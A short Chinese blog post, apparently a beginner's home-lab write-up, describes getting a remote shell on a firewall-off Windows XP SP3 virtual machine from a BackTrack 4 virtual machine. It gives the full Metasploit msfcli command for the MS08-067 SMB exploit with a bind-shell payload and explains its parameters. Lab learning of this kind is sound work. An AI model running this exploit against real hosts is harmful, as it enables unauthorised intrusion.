昨天第一次成功获取了远程主机的shell, 虽然是台很弱的XP主机,但也很想把这个过程记录下来.
用了2台VirtualBox虚拟机,网络用了桥接模式,其他虚拟机的具体设置就不详细说明了.
其中一台装了WinXP SP3,把windows防火墙关掉了,没有装过任何杀毒软件(IP Addr:192.168.0.103)
另一台虚拟机没有装系统,直接载入BT4R2的镜像文件.(IP Addr 192.168.0.101)
接下来就是利用Metasploit的时候了,Metasploit framework是利用系统的各种漏洞(Vulnerability),让exploit免费送给远程主机(RHOST)各种各样的payload,就像使用木马那样来入侵远程主机.在使用前,推荐先进入/pentest/exploits/framework3目录下,输入svn up来更新一下framework.更新完之后,就正式开始了.
root@bt:/pentest/exploits/framework3/#msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.103 TARGET=39 PAYLOAD=windows/shell/bind_tcp E按下回车后,等待...等待...结果出来了,成功获取了目标主机的shell(^o^)v
这次是使用windows/smb/ms08_067_netapi这个exploit来进行攻击,RHOST是目标主机的IP地址,对方主机的端口(RPORT)这里为默认的445,TARGET是目标主机的系统,39代表windows XP SP3 Chinese Simplified版本,如需知道该exploit支持的其他的系统版本代号,输入msfcli windows/smb/ms08_067_netapi T | less即可,如果这里不输入TARGET的话,系统会自动来识别目标主机的系统,但是貌似会认错,我就遇到了msf把我的XP简体中文版误认为了繁体中文版,结果就无法建立连接。这里的windows/shell/bind_tcp就是那个类似木马的东东PAYLOAD,最后那个E表示执行(Execute)。